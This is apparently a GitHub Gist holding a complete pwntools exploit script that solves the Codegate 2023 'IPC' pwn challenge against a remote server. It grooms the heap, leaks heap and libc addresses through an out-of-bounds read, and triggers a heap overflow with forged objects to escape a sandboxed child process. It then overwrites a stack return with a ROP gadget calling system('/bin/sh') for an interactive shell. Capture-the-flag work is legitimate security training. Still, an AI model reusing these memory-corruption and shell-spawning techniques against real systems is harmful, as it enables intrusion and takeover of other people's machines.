Created
June 19, 2023 02:24
-
-
Save vngkv123/6491117f2ed841efb0c73fd420312eab to your computer and use it in GitHub Desktop.
codegate2023 pwn-IPC solution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
from pwn import * | |
import time | |
import subprocess | |
import sys | |
SPRAYLENGTH = 0x1000 | |
def OFFSET(value): | |
assert(value != 0) | |
return 0x10000000000000000 + value | |
def powSolver(p): | |
# hashcash -mb28 ibqkhrhi | |
command = p.recvline()[:-1] | |
log.info("Current hashcash pow command: {}".format(command)) | |
output = subprocess.check_output(command.split(b" ")) | |
p.sendline(output) | |
class CTF: | |
def __init__(self, path): | |
# self.p = process(path) | |
self.p = remote("3.35.171.76", 9000) | |
context.log_level = "debug" | |
powSolver(self.p) | |
self.remote = True | |
self.progress = log.progress("Status") | |
self.direction = { | |
"CHILD": 0, | |
"PARENT": 1, | |
} | |
self.action = { | |
"DECODE": 0, | |
"CONTINUE": 1, | |
"EXIT": 2 | |
} | |
self.types = { | |
"UINT64": 0, | |
"INT64": 1, | |
"STRING": 2, | |
"BOOL": 3, | |
"RPC": 4, | |
} | |
self.calls = { | |
"READMSG": 0, | |
"SENDMSG": 1, | |
"PRINTMSG": 2, | |
"DISABLE": 3, | |
"NOP": 4, | |
} | |
self.printType = { | |
"ASSTR": 0, | |
"ASBYTES": 1, | |
} | |
self.readCount = 0 | |
self.pendingIndex = 0 | |
self.heap = 0 | |
self.code = 0 | |
self.libc = 0 | |
self.shmemMessageAddress = 0 | |
# Common Utilities for exploit | |
def updateProgress(self, msg): | |
self.progress.status(msg) | |
# Specific exploit strategies | |
def encodeUINT64(self, data): | |
encodeData = b"" | |
encodeData += p32(self.types["UINT64"]) | |
encodeData += p64(data) | |
return encodeData | |
def encodeINT64(self, data): | |
encodeData = b"" | |
encodeData += p32(self.types["INT64"]) | |
encodeData += p64(data) | |
return encodeData | |
def encodeBOOLEAN(self, data): | |
encodeData = b"" | |
encodeData += p32(self.types["BOOL"]) | |
encodeData += p8(data) | |
return encodeData | |
def encodeSTRING(self, data): | |
encodeData = b"" | |
encodeData += p32(self.types["STRING"]) | |
encodeData += p64(len(data)) | |
encodeData += data | |
return encodeData | |
def memoryAllocate(self, size, PAD = b"A"): | |
assert(size > 8) | |
data = b"" | |
data += p32(0xdadadada) | |
data += p32(self.action["CONTINUE"]) | |
data += PAD * (size - len(data) - 8) | |
payload = p64(len(data) + 8) + data | |
self.p.send(payload) | |
self.pendingIndex += 1 | |
def memoryDeallocate(self, index, recv=True): | |
data = b"" | |
data += p32(0xcafebabe) | |
data += p32(self.action["DECODE"]) | |
data += p64(self.types["RPC"]) | |
# deserialization count | |
data += p32(1) | |
# rpcAction | |
data += p32(self.calls["READMSG"]) | |
# deserialization data | |
data += self.encodeUINT64(index) | |
payload = p64(len(data) + 8) + data | |
self.p.send(payload) | |
if recv: | |
self.p.recvuntil(b"receive error") | |
def readOffset(self, offset): | |
data = b"" | |
data += p32(0x13371337) | |
data += p32(self.action["DECODE"]) | |
data += p64(self.types["RPC"]) | |
# deserialization count | |
data += p32(4) | |
# rpcAction | |
data += p32(self.calls["PRINTMSG"]) | |
# deserialization data | |
message = b"a" * SPRAYLENGTH | |
data += self.encodeUINT64(len(message)) # length | |
data += self.encodeINT64(OFFSET(offset)) # offset | |
data += self.encodeINT64(self.printType["ASBYTES"]) # print type | |
data += self.encodeSTRING(message) # data | |
payload = p64(len(data) + 8) + data | |
self.p.send(payload) | |
self.p.recvuntil(b"Decode is received") | |
def CRASH(self): | |
data = b"" | |
data += p32(0x13371337) | |
data += p32(self.action["DECODE"]) | |
data += p64(self.types["RPC"]) | |
# deserialization count | |
data += p32(4) | |
# rpcAction | |
data += p32(self.calls["PRINTMSG"]) | |
# deserialization data | |
message = b"a" * SPRAYLENGTH | |
data += self.encodeUINT64(len(message)) # length | |
data += self.encodeINT64(0x8100000000000000) # offset | |
data += self.encodeINT64(self.printType["ASBYTES"]) # print type | |
data += self.encodeSTRING(message) # data | |
payload = p64(len(data) + 8) + data | |
self.p.send(payload) | |
self.p.recvuntil(b"System page size: 4096\n") | |
def read32(self, address): | |
assert(self.heap != 0) | |
offset = 0 | |
if address < self.heap: | |
offset = self.heap - address | |
offset = -offset | |
else: | |
offset = self.heap - address | |
self.readCount += 1 | |
self.readOffset(offset - (0x1120 * self.readCount)) | |
self.p.recvuntil(b"0x000000: ") | |
leakMem = self.p.recv(2 * 8 + 8) | |
leakMem = leakMem.replace(b" ", b"") | |
leakMem = u32(bytes.fromhex(leakMem.decode("utf-8"))) | |
self.p.recvuntil(b"msgID: 0x13371337") | |
return leakMem | |
def read64(self, address): | |
assert(self.heap != 0) | |
offset = 0 | |
if address < self.heap: | |
offset = self.heap - address | |
offset = -offset | |
else: | |
offset = self.heap - address | |
self.readCount += 1 | |
self.readOffset(offset - (0x1120 * self.readCount)) | |
self.p.recvuntil(b"0x000000: ") | |
leakMem = self.p.recv(2 * 8 + 8) | |
leakMem = leakMem.replace(b" ", b"") | |
leakMem = u64(bytes.fromhex(leakMem.decode("utf-8"))) | |
self.p.recvuntil(b"msgID: 0x13371337") | |
return leakMem | |
def readStr(self, address): | |
assert(self.heap != 0) | |
offset = 0 | |
if address < self.heap: | |
offset = self.heap - address | |
offset = -offset | |
else: | |
offset = address - self.heap | |
offset = -offset | |
self.readCount += 1 | |
self.readOffset(offset - (0x1120 * self.readCount)) | |
self.p.recvuntil(b"0x000000: ") | |
leakMem = self.p.recv(2 * 8 + 8) | |
leakMem = leakMem.replace(b" ", b"") | |
leakMem = bytes.fromhex(leakMem.decode("utf-8")) | |
self.p.recvuntil(b"msgID: 0x13371337") | |
return leakMem | |
def prepareExploit(self): | |
# context.log_level = "debug" | |
self.updateProgress("Running prepare exploit...") | |
# length(8) | dataLength(4) | msgID(4) | action(4) | msgType(4) | |
for i in range(10): | |
self.memoryAllocate(SPRAYLENGTH, PAD = p8(0x41 + i)) | |
for i in range(10): | |
self.memoryAllocate(0x200, PAD = p8(0x61 + i)) | |
self.memoryDeallocate(0) | |
self.memoryDeallocate(2) | |
return True | |
def leakMemory(self): | |
self.updateProgress("Leaking memory...") | |
self.readOffset(-SPRAYLENGTH) | |
self.p.recvuntil(b"0x000fe0: ") | |
leakMem = self.p.recv(2 * 8 + 8) | |
leakMem = leakMem.replace(b" ", b"") | |
leakMem = u64(bytes.fromhex(leakMem.decode("utf-8"))) | |
self.heap = leakMem + 0x1060 | |
log.info("First leaked memory: {}".format(hex(self.heap))) | |
# heap base | |
searchBase = self.heap - 0x131a0 | |
log.info("Trying to find code base and libc... start from {}".format(hex(searchBase))) | |
leakMem = self.read64(searchBase + 0x11ef0) | |
# libc base | |
log.info("leaked adjacent libc: {}".format(hex(leakMem))) | |
self.libc = leakMem - 0x7ff620 + 0x1000000 | |
log.info("libc address: {}".format(hex(self.libc))) | |
return True | |
def triggerOverflow(self, message, length, paddData=None): | |
data = b"" | |
data += p32(0x13371337) | |
data += p32(self.action["DECODE"]) | |
data += p64(self.types["RPC"]) | |
# deserialization count | |
data += p32(5) | |
# rpcAction | |
data += p32(self.calls["SENDMSG"]) | |
# deserialization data | |
data += self.encodeUINT64(self.direction["PARENT"]) # direction | |
data += self.encodeUINT64(length - 0x18) # buffer length | |
data += self.encodeUINT64(1) # encode object count | |
data += self.encodeUINT64(self.types["STRING"]) # type | |
# padding bytes | |
paddBytes = b"" | |
if paddData is not None: | |
paddBytes += paddData | |
paddBytes += b"x" * ((length - 0x24) - len(paddBytes)) | |
else: | |
paddBytes += b"x" * (length - 0x24) | |
assert(len(paddBytes) == (length - 0x24)) | |
data += self.encodeSTRING(paddBytes + message) # encode data | |
payload = p64(len(data) + 8) + data | |
self.p.send(payload) | |
self.p.recvuntil(b"Decode is received") | |
time.sleep(0.5) | |
# we need to make stable R/W primitive | |
# TODO: implements encode logic and second vulnerability | |
def getStage1Flag(self): | |
self.updateProgress("Getting a stage1 flag...") | |
self.memoryDeallocate(14) | |
self.memoryDeallocate(12) | |
self.memoryDeallocate(10) | |
message = b"" | |
message += p64(0x215) + p64(0x1f8) + p64(0xc0465324) + p64(4) | |
stage1memory = self.libc - 0x800000 + 0x28 | |
# stage1memory = self.read64(stage1memory) | |
log.info("Gussed stage1 flag memory: {}".format(hex(stage1memory))) | |
# first member should be vector pointer | |
fakeVector = b"" | |
fakeVector += p64(stage1memory) | |
message += fakeVector | |
self.triggerOverflow(message, 0x200) | |
self.memoryDeallocate(13, False) | |
self.p.recvuntil(b"Pended decode is received\n") | |
log.info("stage1 flag: {}".format(self.p.recvuntil(b"\n").decode("utf-8"))) | |
return True | |
def memoryRead(self, address): | |
self.CRASH() | |
time.sleep(1) | |
for i in range(10): | |
self.memoryAllocate(0x200, PAD = p8(0x61 + i)) | |
self.memoryDeallocate(4) | |
self.memoryDeallocate(2) | |
self.memoryDeallocate(0) | |
message = b"" | |
message += p64(0x215) + p64(0x1f8) + p64(0xc0465324) + p64(4) | |
log.info("Trying to leaking value at {}".format(hex(address))) | |
# first member should be vector pointer | |
fakeData = b"" | |
fakeData = p64(address) + p64(0x1000) + p64(0) * 4 | |
fakeVector = b"" | |
fakeVector += p64(self.shmemMessageAddress) | |
message += fakeVector | |
self.triggerOverflow(message, 0x200, fakeData) | |
self.memoryDeallocate(5, False) | |
self.p.recvuntil(b"Pended decode is received\n") | |
leakedData = u64(self.p.recvuntil(b"\n")[:-1].ljust(8, b"\x00")) | |
log.info("Leaked memory at {}: {}".format(hex(address), hex(leakedData))) | |
return leakedData | |
def exitMessage(self): | |
data = b"" | |
data += p32(0x13371337) | |
data += p32(self.action["EXIT"]) | |
data += p64(self.types["RPC"]) | |
data += b"A" * 0x100 | |
payload = p64(len(data) + 8) + data | |
self.p.send(payload) | |
def exploitParent(self): | |
self.updateProgress("Exploit parent process...") | |
for i in range(10): | |
self.memoryAllocate(0x200, PAD = p8(0x61 + i)) | |
self.memoryDeallocate(4) | |
self.memoryDeallocate(2) | |
self.memoryDeallocate(0) | |
# array's index pos => +0x800 | |
parentMessageQueue = self.libc - 0x800000 + 0x848 | |
shmemMessageAddress = self.libc - 0x800000 + (4 << 20) + 0x2c | |
self.shmemMessageAddress = shmemMessageAddress | |
log.info("Parnet message queue address: {}".format(hex(parentMessageQueue))) | |
log.info("Shared message address: {}".format(hex(shmemMessageAddress))) | |
fakeData = b"" | |
# message | |
fakeData += p64(shmemMessageAddress + 0x10) | |
# m_index | |
fakeData += p64(0x100) | |
# fake message data | |
fakeData += p64(0x1000) | |
# msgID | |
fakeData += p32(0x13371337) | |
# action | |
fakeData += p32(self.action["DECODE"]) | |
# msgType | |
fakeData += p64(self.types["RPC"]) | |
# deserialization count | |
fakeData += p32(0) | |
# rpcAction | |
fakeData += p32(self.calls["DISABLE"]) | |
payload = b"" | |
payload += p64(0x215) + p64(0x1f8) + p64(0xc1465324) + p64(4) | |
# dst (last message and index) | |
payload += p64(parentMessageQueue + 0x7f8) | |
payload += p64(1) * 2 | |
# src | |
payload += p64(shmemMessageAddress) | |
# length | |
payload += p64(0x10) | |
self.triggerOverflow(payload, 0x200, fakeData) | |
self.memoryDeallocate(3, False) | |
# crash child process again, but newly created child doesn't have sandbox. | |
time.sleep(1) | |
# read process stack address to do ROP | |
offset = 0 | |
if self.remote is True: | |
offset += 0xeb000 | |
stackAddress = self.libc - 0x800000 + 0x1050 | |
stackAddress = self.memoryRead(stackAddress) | |
# reload child process | |
self.CRASH() | |
# get shell from child process | |
for i in range(10): | |
self.memoryAllocate(0x200, PAD = p8(0x61 + i)) | |
time.sleep(0.5) | |
self.memoryDeallocate(4) | |
self.memoryDeallocate(2) | |
self.memoryDeallocate(0) | |
time.sleep(0.5) | |
realServerOffsetVariant = 0x1000 | |
system = self.libc + 0x50d60 + offset + realServerOffsetVariant | |
binsh = self.libc + 0x1d8698 + offset + realServerOffsetVariant | |
log.info("stack address: {}".format(hex(stackAddress))) | |
log.info("libc's system: {}, /bin/sh: {}".format(hex(system), hex(binsh))) | |
fakeData = b"" | |
# fake message data | |
# 0x0000000000125bae : xor ebp, ebp ; pop rax ; pop rdi ; call rax | |
fakeData += p64(self.libc + 0x0000000000125bae + offset + realServerOffsetVariant) | |
# system | |
fakeData += p64(system) | |
# /bin/sh | |
fakeData += p64(binsh) | |
# dst (last message and index) | |
payload = b"" | |
payload += p64(0x215) + p64(0x1f8) + p64(0xc1465324) + p64(4) | |
payload += p64(stackAddress + 0x18) # overwrite target | |
payload += p64(1) * 2 | |
# src | |
payload += p64(shmemMessageAddress) | |
# length | |
payload += p64(len(fakeData)) | |
self.triggerOverflow(payload, 0x200, fakeData) | |
# pause() | |
self.memoryDeallocate(5, False) | |
# self.p.recvuntil(b"Done with meessage receive msgID: 0xc1465324") | |
return True | |
def run(self): | |
if self.prepareExploit() is False: return False | |
if self.leakMemory() is False: return False | |
if self.getStage1Flag() is False: return False | |
if self.exploitParent() is False: return False | |
self.p.interactive() | |
return True | |
if __name__ == "__main__": | |
solver = CTF("../prob/for_organizer/build/IPC") | |
if solver.run() is True: | |
solver.updateProgress("Exploit success") | |
else: | |
solver.updateProgress("Exploit fail") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment